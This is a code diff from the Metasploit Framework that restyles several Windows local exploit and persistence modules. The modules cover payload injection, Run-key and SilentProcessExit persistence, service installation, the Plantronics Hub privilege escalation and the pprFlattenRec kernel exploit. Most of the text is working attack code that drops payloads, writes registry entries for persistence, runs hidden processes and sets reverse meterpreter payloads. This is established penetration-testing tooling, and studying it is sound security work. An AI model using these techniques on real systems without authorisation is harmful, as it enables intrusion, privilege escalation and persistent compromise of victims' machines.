+          isn't selected, then it'll default to a reverse x86 TCP meterpreter.  If the PID
+          datastore option isn't specified, then it'll inject into notepad.exe instead.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Carlos Perez <carlos_perez[at]darkoperator.com>',
           'sinn3r'
         ],
-      'Platform'        => [ 'win' ],
-      'Arch'            => [ ARCH_X86, ARCH_X64 ],
-      'SessionTypes'    => [ 'meterpreter' ],
-      'Targets'         => [ [ 'Windows', {} ] ],
-      'DefaultTarget'   => 0,
-      'DisclosureDate'  => '2011-10-12'
-    ))
+        'Platform' => [ 'win' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [ [ 'Windows', {} ] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2011-10-12'
+      )
+    )
 
     register_options(
       [
@@ -40,7 +41,8 @@ class MetasploitModule < Msf::Exploit::Local
         OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)', 0]),
         OptBool.new('AUTOUNHOOK', [false, 'Auto remove EDRs hooks', false]),
         OptInt.new('WAIT_UNHOOK', [true, 'Seconds to wait for unhook to be executed', 5])
-      ])
+      ]
+    )
   end
 
   # Run Method for when run command is issued
@@ -131,6 +133,7 @@ class MetasploitModule < Msf::Exploit::Local
   def inject_into_pid(pid)
     vprint_status("Performing Architecture Check")
     return if not arch_check(@payload_arch, pid)
+
     begin
       print_status("Preparing '#{@payload_name}' for PID #{pid}")
       raw = payload.encoded

--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -13,67 +13,68 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Windows Persistent Registry Startup Payload Installer',
-      'Description'    => %q{
-        This module will install a payload that is executed during boot.
-        It will be executed either at user logon or system startup via the registry
-        value in "CurrentVersion\Run" (depending on privilege and selected method).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Persistent Registry Startup Payload Installer',
+        'Description' => %q{
+          This module will install a payload that is executed during boot.
+          It will be executed either at user logon or system startup via the registry
+          value in "CurrentVersion\Run" (depending on privilege and selected method).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Carlos Perez <carlos_perez[at]darkoperator.com>',
           'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
-      'Platform'       => [ 'win' ],
-      'SessionTypes'   => [ 'meterpreter' ],
-      'Targets'        => [ [ 'Windows', {} ] ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2011-10-19',
-      'DefaultOptions' =>
-        {
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [ [ 'Windows', {} ] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2011-10-19',
+        'DefaultOptions' => {
           'DisablePayloadHandler' => true
         }
-    ))
+      )
+    )
 
     register_options([
       OptInt.new('DELAY',
-        [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+                 [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
       OptEnum.new('STARTUP',
-        [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+                  [true, 'Startup type for the persistent payload.', 'USER', ['USER', 'SYSTEM']]),
       OptString.new('VBS_NAME',
-        [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+                    [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
       OptString.new('EXE_NAME',
-        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+                    [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
       OptString.new('REG_NAME',
-        [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+                    [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
       OptString.new('PATH',
-        [false, 'Path to write payload (%TEMP% by default).', nil])
+                    [false, 'Path to write payload (%TEMP% by default).', nil])
     ])
 
     register_advanced_options([
       OptBool.new('HANDLER',
-        [false, 'Start an exploit/multi/handler job to receive the connection', false]),
+                  [false, 'Start an exploit/multi/handler job to receive the connection', false]),
       OptBool.new('EXEC_AFTER',
-        [false, 'Execute persistent script after installing.', false])
+                  [false, 'Execute persistent script after installing.', false])
     ])
   end
 
   # Exploit method for when exploit command is issued
   def exploit
     # Define default values
-    rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
-    rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
-    reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
-    startup   = datastore['STARTUP'].downcase
+    rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    reg_val = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    startup = datastore['STARTUP'].downcase
     delay = datastore['DELAY']
     exec_after = datastore['EXEC_AFTER']
     handler = datastore['HANDLER']
     @clean_up_rc = ""
 
-    rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'
-    rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'
+    rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4, 4] != '.vbs'
+    rexe_name = rexe_name + '.exe' if rexe_name[-4, 4] != '.exe'
 
     # Connect to the session
     begin
@@ -101,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Local
     exe = generate_payload_exe
     # Generate the vbs payload
     vprint_status("Generating VBS persistent script (#{rvbs_name})")
-    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
+    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, { :persist => true, :delay => delay, :exe_filename => rexe_name })
     # Writing the payload to target
     vprint_status("Writing payload inside the VBS script on the target")
     script_on_target = write_script_to_target(vbsscript, rvbs_name)
@@ -114,10 +115,12 @@ class MetasploitModule < Msf::Exploit::Local
     when 'user'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKCU", script_on_target, reg_val)
+
       vprint_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on")
     when 'system'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKLM", script_on_target, reg_val)
+
       vprint_status("Payload will execute at the next SYSTEM startup")
     else
       print_error("Something went wrong. Invalid STARTUP method: #{startup}")
@@ -141,24 +144,23 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Clean up Meterpreter RC file: #{clean_rc}")
 
     report_note(:host => host,
-      :type => "host.persistance.cleanup",
-      :data => {
-        :local_id    => session.sid,
-        :stype       => session.type,
-        :desc        => session.info,
-        :platform    => session.platform,
-        :via_payload => session.via_payload,
-        :via_exploit => session.via_exploit,
-        :created_at  => Time.now.utc,
-        :commands    => @clean_up_rc
-      }
-    )
+                :type => "host.persistance.cleanup",
+                :data => {
+                  :local_id => session.sid,
+                  :stype => session.type,
+                  :desc => session.info,
+                  :platform => session.platform,
+                  :via_payload => session.via_payload,
+                  :via_exploit => session.via_exploit,
+                  :created_at => Time.now.utc,
+                  :commands => @clean_up_rc
+                })
   end
 
   # Writes script to target host and returns the pathname of the target file or nil if the
   # file could not be written.
   def write_script_to_target(vbs, name)
-    filename = name || Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+    filename = name || Rex::Text.rand_text_alpha((rand(8) + 6)) + ".vbs"
     temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
     filepath = temppath + "\\" + filename
 
@@ -196,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Local
   # Installs payload in to the registry HKLM or HKCU
   def write_to_reg(key, script_on_target, registry_value)
     regsuccess = true
-    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
+    nam = registry_value || Rex::Text.rand_text_alpha(rand(8) + 8)
     key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
 
     print_status("Installing as #{key_path}\\#{nam}")
@@ -252,10 +254,10 @@ class MetasploitModule < Msf::Exploit::Local
       mh.options.validate(mh.datastore)
       # Execute showing output
       mh.exploit_simple(
-        'Payload'     => mh.datastore['PAYLOAD'],
-        'LocalInput'  => self.user_input,
+        'Payload' => mh.datastore['PAYLOAD'],
+        'LocalInput' => self.user_input,
         'LocalOutput' => self.user_output,
-        'RunAsJob'    => true
+        'RunAsJob' => true
       )
 
       # Check to make sure that the handler is actually valid

--- a/modules/exploits/windows/local/persistence_image_exec_options.rb
+++ b/modules/exploits/windows/local/persistence_image_exec_options.rb
@@ -12,37 +12,36 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Windows Silent Process Exit Persistence',
-      'Description'    => %q(
-      Windows allows you to set up a debug process when a process exits.
-      This module uploads a payload and declares that it is the debug
-      process to launch when a specified process exits.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Silent Process Exit Persistence',
+        'Description' => %q{
+          Windows allows you to set up a debug process when a process exits.
+          This module uploads a payload and declares that it is the debug
+          process to launch when a specified process exits.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Mithun Shanbhag', # earliest author found
           'bwatters-r7', # msf module
         ],
-      'Platform'       => [ 'win' ],
-      'SessionTypes'   => [ 'meterpreter' ],
-      'Targets'        =>
-        [
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [
           [ 'Automatic', {} ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2008-06-28',
-      'References'     =>
-        [
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2008-06-28',
+        'References' => [
           ['URL', 'https://attack.mitre.org/techniques/T1183/'],
           ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'DisablePayloadHandler' => true
         }
-    ))
+      )
+    )
     register_options([
       OptString.new('PAYLOAD_NAME',
                     [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
@@ -78,13 +77,13 @@ class MetasploitModule < Msf::Exploit::Local
                   type: "REG_DWORD",
                   value_value: 512)
     reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
-                   value_name: "ReportingMode",
-                   type: "REG_DWORD",
-                   value_value: 1)
+                  value_name: "ReportingMode",
+                  type: "REG_DWORD",
+                  value_value: 1)
     reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
-                   value_name: "MonitorProcess",
-                   type: "REG_SZ",
-                   value_value: payload_pathname)
+                  value_name: "MonitorProcess",
+                  type: "REG_SZ",
+                  value_value: payload_pathname)
     silent_process_exit_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit"
     registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)
     reg_keys.each do |key|
@@ -108,4 +107,3 @@ class MetasploitModule < Msf::Exploit::Local
     upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)
   end
 end
-

--- a/modules/exploits/windows/local/persistence_service.rb
+++ b/modules/exploits/windows/local/persistence_service.rb
@@ -12,33 +12,37 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Windows Persistent Service Installer',
-      'Description'   => %q{
-        This Module will generate and upload an executable to a remote host, next will make it a persistent service.
-        It will create a new service which will start the payload whenever the service is running. Admin or system
-        privilege is required.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'Green-m <greenm.xxoo[at]gmail.com>' ],
-      'Platform'      => [ 'windows' ],
-      'Targets'       => [['Windows', {}]],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultTarget' => 0,
-      'References'    => [
-        [ 'URL', 'https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp' ]
-      ],
-      'DisclosureDate'=> '2018-10-20'
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Persistent Service Installer',
+        'Description' => %q{
+          This Module will generate and upload an executable to a remote host, next will make it a persistent service.
+          It will create a new service which will start the payload whenever the service is running. Admin or system
+          privilege is required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Green-m <greenm.xxoo[at]gmail.com>' ],
+        'Platform' => [ 'windows' ],
+        'Targets' => [['Windows', {}]],
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultTarget' => 0,
+        'References' => [
+          [ 'URL', 'https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp' ]
+        ],
+        'DisclosureDate' => '2018-10-20'
+      )
+    )
 
     register_options(
       [
-        OptInt.new('RETRY_TIME',   [false, 'The retry time that shell connect failed. 5 seconds as default.', 5 ]),
+        OptInt.new('RETRY_TIME', [false, 'The retry time that shell connect failed. 5 seconds as default.', 5 ]),
         OptString.new('REMOTE_EXE_PATH', [false, 'The remote victim exe path to run. Use temp directory as default. ']),
         OptString.new('REMOTE_EXE_NAME', [false, 'The remote victim name. Random string as default.']),
-        OptString.new('SERVICE_NAME',   [false, 'The name of service. Random string as default.' ]),
-        OptString.new('SERVICE_DESCRIPTION',   [false, 'The description of service. Random string as default.' ])
-     ])
+        OptString.new('SERVICE_NAME', [false, 'The name of service. Random string as default.' ]),
+        OptString.new('SERVICE_DESCRIPTION', [false, 'The description of service. Random string as default.' ])
+      ]
+    )
   end
 
   # Run Method for when run command is issued
@@ -57,11 +61,11 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Running module against #{sysinfo['Computer']}")
 
     # Set variables
-    rexepath              = datastore['REMOTE_EXE_PATH']
-    @retry_time           = datastore['RETRY_TIME']
-    rexename              = datastore['REMOTE_EXE_NAME']     || Rex::Text.rand_text_alpha(4..8)
-    @service_name         = datastore['SERVICE_NAME']        || Rex::Text.rand_text_alpha(4..8)
-    @service_description  = datastore['SERVICE_DESCRIPTION'] || Rex::Text.rand_text_alpha(8..16)
+    rexepath = datastore['REMOTE_EXE_PATH']
+    @retry_time = datastore['RETRY_TIME']
+    rexename = datastore['REMOTE_EXE_NAME'] || Rex::Text.rand_text_alpha(4..8)
+    @service_name = datastore['SERVICE_NAME'] || Rex::Text.rand_text_alpha(4..8)
+    @service_description = datastore['SERVICE_DESCRIPTION'] || Rex::Text.rand_text_alpha(8..16)
 
     # Add the windows pe suffix to rexename
     unless rexename.end_with?('.exe')
@@ -84,17 +88,17 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Cleanup Meterpreter RC File: #{clean_rc}")
 
     report_note(host: host,
-        type: "host.persistance.cleanup",
-        data: {
-          local_id: session.sid,
-          stype: session.type,
-          desc: session.info,
-          platform: session.platform,
-          via_payload: session.via_payload,
-          via_exploit: session.via_exploit,
-          created_at: Time.now.utc,
-          commands: @clean_up_rc
-        })
+                type: "host.persistance.cleanup",
+                data: {
+                  local_id: session.sid,
+                  stype: session.type,
+                  desc: session.info,
+                  platform: session.platform,
+                  via_payload: session.via_payload,
+                  via_exploit: session.via_exploit,
+                  created_at: Time.now.utc,
+                  commands: @clean_up_rc
+                })
   end
 
   def create_payload
@@ -110,17 +114,17 @@ class MetasploitModule < Msf::Exploit::Local
     if rexepath
       begin
         temprexe = rexepath + "\\" + rexename
-        write_file_to_target(temprexe,rexe)
+        write_file_to_target(temprexe, rexe)
       rescue Rex::Post::Meterpreter::RequestError
         print_warning("Insufficient privileges to write in #{rexepath}, writing to %TEMP%")
         temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
-        write_file_to_target(temprexe,rexe)
+        write_file_to_target(temprexe, rexe)
       end
 
     # Write to %temp% directory if not set REMOTE_EXE_PATH
     else
       temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
-      write_file_to_target(temprexe,rexe)
+      write_file_to_target(temprexe, rexe)
     end
 
     print_good("Meterpreter service exe written to #{temprexe}")
@@ -131,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Local
     temprexe
   end
 
-  def write_file_to_target(temprexe,rexe)
+  def write_file_to_target(temprexe, rexe)
     fd = session.fs.file.new(temprexe, "wb")
     fd.write(rexe)
     fd.close
@@ -161,19 +165,19 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Creating service #{@service_name}")
 
     begin
-      session.sys.process.execute("cmd.exe /c \"#{path}\" #{@install_cmd}", nil, {'Hidden' => true})
+      session.sys.process.execute("cmd.exe /c \"#{path}\" #{@install_cmd}", nil, { 'Hidden' => true })
     rescue ::Exception => e
       print_error("Failed to install the service.")
       print_error(e.to_s)
     end
 
     @clean_up_rc = "execute -H -f sc.exe -a \"delete #{@service_name}\"\n" + @clean_up_rc
-    @clean_up_rc = "execute -H -f sc.exe -a \"stop #{@service_name}\"\n"   + @clean_up_rc
+    @clean_up_rc = "execute -H -f sc.exe -a \"stop #{@service_name}\"\n" + @clean_up_rc
   end
 
   def metsvc_template(buf)
     @install_cmd = Rex::Text.rand_text_alpha(4..8)
-    @start_cmd   = Rex::Text.rand_text_alpha(4..8)
+    @start_cmd = Rex::Text.rand_text_alpha(4..8)
     template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'persistence_service', 'service.erb'))
     ERB.new(template).result(binding)
   end

--- a/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
+++ b/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
@@ -13,43 +13,43 @@ class MetasploitModule < Msf::Exploit::Local
   include Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Plantronics Hub SpokesUpdateService Privilege Escalation',
-      'Description'    => %q{
-        The Plantronics Hub client application for Windows makes use of an
-        automatic update service `SpokesUpdateService.exe` which automatically
-        executes a file specified in the `MajorUpgrade.config` configuration
-        file as SYSTEM. The configuration file is writable by all users by default.
+    super(
+      update_info(
+        info,
+        'Name' => 'Plantronics Hub SpokesUpdateService Privilege Escalation',
+        'Description' => %q{
+          The Plantronics Hub client application for Windows makes use of an
+          automatic update service `SpokesUpdateService.exe` which automatically
+          executes a file specified in the `MajorUpgrade.config` configuration
+          file as SYSTEM. The configuration file is writable by all users by default.
 
-        This module has been tested successfully on Plantronics Hub version 3.13.2
-        on Windows 7 SP1 (x64).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-      [
-        'Markus Krell', # Discovery and PoC
-        'bcoles'        # Metasploit
-      ],
-      'References'     =>
-        [
+          This module has been tested successfully on Plantronics Hub version 3.13.2
+          on Windows 7 SP1 (x64).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Markus Krell', # Discovery and PoC
+          'bcoles'        # Metasploit
+        ],
+        'References' => [
           ['CVE', '2019-15742'],
           ['EDB', '47845'],
           ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf']
         ],
-      'Platform'       => ['win'],
-      'SessionTypes'   => ['meterpreter'],
-      'Targets'        => [['Automatic', {}]],
-      'DisclosureDate' => '2019-08-30',
-      'DefaultOptions' =>
-        {
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2019-08-30',
+        'DefaultOptions' => {
           'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
         },
-      'Notes'          =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ]
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0
+      )
+    )
     register_advanced_options [
       OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
     ]

--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
@@ -13,54 +12,54 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::ReflectiveDLLInjection
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
-      'Description'    => %q{
-          This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
-        of uninitialized data which allows to corrupt memory. At the moment, the module has
-        been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
-          'progmboy <programmeboy[at]gmail.com>',    # Original Exploit
-          'Keebie4e',     # Metasploit integration
-          'egypt',        # Metasploit integration
-          'sinn3r',       # Metasploit integration
-          'Ben Campbell',    # Metasploit integration
-          'juan vazquez', # Metasploit integration
-          'OJ Reeves'     # Metasploit integration
-        ],
-      'Arch'           => ARCH_X86,
-      'Platform'       => 'win',
-      'SessionTypes'   => [ 'meterpreter' ],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-          'WfsDelay' => 30
-        },
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ]
-        ],
-      'Payload'        =>
-        {
-          'Space'       => 4096,
-          'DisableNops' => true
-        },
-      'References'     =>
-        [
-          [ 'CVE', '2013-3660' ],
-          [ 'EDB', '25912' ],
-          [ 'OSVDB', '93539' ],
-          [ 'MSB', 'MS13-053' ],
-          [ 'URL', 'https://seclists.org/fulldisclosure/2013/May/91' ],
-        ],
-      'DisclosureDate' => '2013-05-15',
-      'DefaultTarget'  => 0
-    }))
+          'Name' => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
+          'Description' => %q{
+            This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
+            of uninitialized data which allows to corrupt memory. At the moment, the module has
+            been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
+            'progmboy <programmeboy[at]gmail.com>', # Original Exploit
+            'Keebie4e',     # Metasploit integration
+            'egypt',        # Metasploit integration
+            'sinn3r',       # Metasploit integration
+            'Ben Campbell', # Metasploit integration
+            'juan vazquez', # Metasploit integration
+            'OJ Reeves'     # Metasploit integration
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+            'WfsDelay' => 30
+          },
+          'Targets' => [
+            [ 'Automatic', {} ]
+          ],
+          'Payload' => {
+            'Space' => 4096,
+            'DisableNops' => true
+          },
+          'References' => [
+            [ 'CVE', '2013-3660' ],
+            [ 'EDB', '25912' ],
+            [ 'OSVDB', '93539' ],
+            [ 'MSB', 'MS13-053' ],
+            [ 'URL', 'https://seclists.org/fulldisclosure/2013/May/91' ],
+          ],
+          'DisclosureDate' => '2013-05-15',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def check

--- a/modules/exploits/windows/local/ps_persist.rb
+++ b/modules/exploits/windows/local/ps_persist.rb
@@ -11,39 +11,40 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Powershell::DotNet
   include Msf::Post::File
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'                 => "Powershell Payload Execution",
-      'Description'          => %q{
-        This module generates a dynamic executable on the session host using .NET templates.
-        Code is pulled from C# templates and impregnated with a payload before being
-        sent to a modified PowerShell session with .NET 4 loaded. The compiler builds
-        the executable (standard or Windows service) in memory and produces a binary
-        which can be started/installed and downloaded for later use. After compilation the
-        PoweShell session can also sign the executable if provided a path the a .pfx formatted
-        certificate.
-      },
-      'License'              => MSF_LICENSE,
-      'Author'               => [
-        'RageLtMan <rageltman[at]sempervictus>', # Module, libs, and powershell-fu
-        'Matt "hostess" Andreko' # .NET harness, and requested modifications
-      ],
-
-      'Payload'        =>
-        {
-          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
-          'EncoderOptions' =>
-        {
-          'BufferRegister' => 'EAX',
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Powershell Payload Execution",
+        'Description' => %q{
+          This module generates a dynamic executable on the session host using .NET templates.
+          Code is pulled from C# templates and impregnated with a payload before being
+          sent to a modified PowerShell session with .NET 4 loaded. The compiler builds
+          the executable (standard or Windows service) in memory and produces a binary
+          which can be started/installed and downloaded for later use. After compilation the
+          PoweShell session can also sign the executable if provided a path the a .pfx formatted
+          certificate.
         },
-      },
-      'Platform'      => [ 'windows' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets' => [ [ 'Universal', {} ] ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => '2012-08-14'
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'RageLtMan <rageltman[at]sempervictus>', # Module, libs, and powershell-fu
+          'Matt "hostess" Andreko' # .NET harness, and requested modifications
+        ],
 
-    ))
+        'Payload' => {
+          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
+          'EncoderOptions' =>
+              {
+                'BufferRegister' => 'EAX',
+              },
+        },
+        'Platform' => [ 'windows' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [ [ 'Universal', {} ] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2012-08-14'
+      )
+    )
 
     register_options(
       [
@@ -53,7 +54,8 @@ class MetasploitModule < Msf::Exploit::Local
         OptBool.new('START_APP', [false, 'Run EXE/Install Service', true ]),
         OptString.new('OUTPUT_TARGET', [false, 'Name and path of the generated executable, default random, omit extension' ]),
 
-      ])
+      ]
+    )
 
     register_advanced_options(
       [
@@ -64,12 +66,11 @@ class MetasploitModule < Msf::Exploit::Local
         OptString.new('PASSWORD', [false, 'Windows user password - cleartext']),
         OptString.new('DOMAIN', [false, 'Windows domain or workstation name']),
 
-      ])
-
+      ]
+    )
   end
 
   def exploit
-
     # Make sure we meet the requirements before running the script
     if !(session.type == "meterpreter" || have_powershell?)
       print_error("Incompatible Environment")
@@ -87,15 +88,15 @@ class MetasploitModule < Msf::Exploit::Local
 
     com_opts = {}
     com_opts[:net_clr] = 4.0 # Min .NET runtime to load into a PS session
-    com_opts[:target] = datastore['OUTPUT_TARGET'] || session.sys.config.getenv('TEMP') + "\\#{ Rex::Text.rand_text_alpha(rand(8)+8) }.exe"
-    com_opts[:payload] = payload_script #payload.encoded
+    com_opts[:target] = datastore['OUTPUT_TARGET'] || session.sys.config.getenv('TEMP') + "\\#{Rex::Text.rand_text_alpha(rand(8) + 8)}.exe"
+    com_opts[:payload] = payload_script # payload.encoded
     vprint_good com_opts[:payload].length.to_s
 
     if datastore['SVC_GEN']
       com_opts[:harness] = File.join(Msf::Config.install_root, 'external', 'source', 'psh_exe', 'dot_net_service.cs')
       com_opts[:assemblies] = ['System.ServiceProcess.dll', 'System.Configuration.Install.dll']
     else
-      com_opts[:harness] = File.join(Msf::Config.install_root, 'external', 'source', 'psh_exe','dot_net_exe.cs')
+      com_opts[:harness] = File.join(Msf::Config.install_root, 'external', 'source', 'psh_exe', 'dot_net_exe.cs')
     end
 
     com_opts[:cert] = datastore['CERT_PATH']
@@ -116,45 +117,43 @@ class MetasploitModule < Msf::Exploit::Local
     end
     # Check for result
     begin
-      size = session.fs.file.stat(com_opts[:target].gsub('\\','\\\\')).size
-      vprint_good("File #{com_opts[:target].gsub('\\','\\\\')} found, #{size}kb")
+      size = session.fs.file.stat(com_opts[:target].gsub('\\', '\\\\')).size
+      vprint_good("File #{com_opts[:target].gsub('\\', '\\\\')} found, #{size}kb")
     rescue
-      print_error("File #{com_opts[:target].gsub('\\','\\\\')} not found")
+      print_error("File #{com_opts[:target].gsub('\\', '\\\\')} not found")
       return
     end
 
     # Run the harness
     if datastore['START_APP']
       if datastore['SVC_GEN']
-        service_create(datastore['SVC_NAME'], datastore['SVC_DNAME'], com_opts[:target].gsub('\\','\\\\'), startup=2, server=nil)
+        service_create(datastore['SVC_NAME'], datastore['SVC_DNAME'], com_opts[:target].gsub('\\', '\\\\'), startup = 2, server = nil)
         if service_start(datastore['SVC_NAME']).to_i == 0
           vprint_good("Service Started")
         end
       else
-        session.sys.process.execute(com_opts[:target].gsub('\\','\\\\'), nil, {'Hidden' => true, 'Channelized' => true})
+        session.sys.process.execute(com_opts[:target].gsub('\\', '\\\\'), nil, { 'Hidden' => true, 'Channelized' => true })
       end
     end
 
-
     print_good('Finished!')
   end
-
 
   # This should be handled by the exploit mixin, right?
   def payload_script
     pay_mod = framework.payloads.create(datastore['PAYLOAD'])
     payload = pay_mod.generate_simple(
-      "BadChars"    => '',
-      "Format"      => 'raw',
-      "Encoder"     => 'x86/alpha_mixed',
+      "BadChars" => '',
+      "Format" => 'raw',
+      "Encoder" => 'x86/alpha_mixed',
       "ForceEncode" => true,
       "Options" =>
        {
